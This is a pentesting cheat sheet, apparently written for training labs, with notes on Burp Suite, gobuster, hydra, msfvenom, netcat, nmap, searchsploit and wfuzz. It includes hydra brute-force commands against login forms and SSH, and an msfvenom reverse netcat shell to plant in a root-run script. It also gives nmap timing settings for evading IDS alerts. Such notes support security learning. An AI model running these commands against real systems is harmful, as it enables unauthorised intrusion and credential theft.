Burp Suite is a framework of web application pentesting tools. See ZAP for a similar (completely free) tool).
Burp Suite needs to be able to act as a proxy. Follow this tutorial by tryhackme to set up FoxyProxy in firefox
Burp suite has a number of different components:
From the Positions tab, you may select different fields to attack.
Attack type
Add payloads (dictionaries).
To start the attack, press the attack button in the top right corner. :)
The intercept tab intercepts web traffic and allows you to view the request. You can send particular parts of this request to different modules, such as the Intruder module.
Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains, virtual host names, and open amazon S3 buckets.
There are three modes:
dir
vhost
dns
dir
mode arguments:
-u
: What url to enumerate-w
: Wordlist to append to the url/usr/share/wordlists/dirb/big.txt
-x
: Extensions to append to each word in the wordlistExample:
$ gobuster dir -u http://example.com -w wordlist.txt -x php,txt,html
Hydra is a network logon cracker for many different services.
General syntax:
$ hydra -l <username> -P <wordlist> <Target IP> http-post-form "<URL Path>:<Post Arg>=^<KEY>^:<TAGS>"
Example:
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username^USER^&password=^PASS^:F=incorrect"
General syntax:
$ hydra -l <username> -P <absolute path to passwords file> <Target IP> -t <thread count> ssh
Payload generator and encoder. Generates payloads that allow for things such as a reverse netcat connection
If there is a script that can we can write to that runs as root on the target machine:
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
nv -lvp 8888
echo <msfvenom output> > script
Netcat allows you to listen or connect to TCP/UDP ports
General syntax:
$ netcat [options] host port
Create a listener on port 4444:
$ netcat -l 4444
Send traffic (from file specifically):
$ netcat 192.168.1.1 4444 < file.txt
-oA
: Saves output in all three file types; grepable, XML, and script kiddie-oG
: Saves output in a grepable format-oX
: Saves output as an XML file-oS
: Saves output in a script kiddie format-v
: Verbose. Some output is nice to see the progress-vv
: Very verbose-A
: Aggresive scan. Enable OS detection, version detection, script scanning, and traceroute-O -sV -sC --traceroute
-O
: Operating system detection-p <ports,>
: Specify ports to scan-p-
: Scan every port-Pn
: Treat each host as active. Skip host discovery-sS
: TCP SYN scan (stealth scan). Quick scan. Does not complete the TCP connection-sT
: TCP connection scan-sU
: UDP scan-sV
: Service version scanTo use a script: --script <script name>
. Here is a list of nmap scripts.
Useful scripts:
-T<N>
: How aggressively (quickly) to scan. Ranges from 0 to 5.
0
: Paranoid. Waits 5 minutes between each probe1
: Sneaky. Waits 15 seconds between probes2
: Polite. Waits 0.4 seconds between probes3
: Normal. Default. Includes parallelization4
: Aggressive5
: Insane1 and 2 are useful to avoid IDS alerts.
SearchSploit is a command line search tool for Exploit-DB
Needs to be updated periodically (weekly): searchsploit -u
You can use the XML file generated by nmap to automate finding exploits.
--nmap <file>.xml
cheatsheet. PayloadsAllTheThings. General sql injection payload list.
Wfuzz is a web application bruteforcer. It replaces any occurrence of the FUZZ keyword with a given payload. It can fuzz URIs, similar to gobuster, to more complicated tasks, such as GET and POST parameters.
Arguments:
-d "date=FUZZ"
-z file,wordlist.txt
--hc 404
Example:
$ wfuzz -c -z file,big.txt localhost:80/FUZZ/note.txt
$ wfuzz -c -z file,big.txt -d "username=FUZZ&password=FUZZ" -u http://example.com/login.php
$ wfuzz -c -z file,wordlist.txt -d "date=FUZZ" -u http://10.10.180.198/api/site-log.php --hh 0
Get DNS information for a website.
Example:
$ whois daltoncole.com
A large collection of word lists can be found here.
rockyou.txt
is a leaked unencrypted password list from RockYou. On Kali, it can be found under /usr/share/wordlists/rockyou.txt.gz
. Use gzip -d rockyou.txt.gz
to unzip it.
OWASP ZAP is an enumeration tool, similar to Burp Suite, however, ZAP is open source and completely free.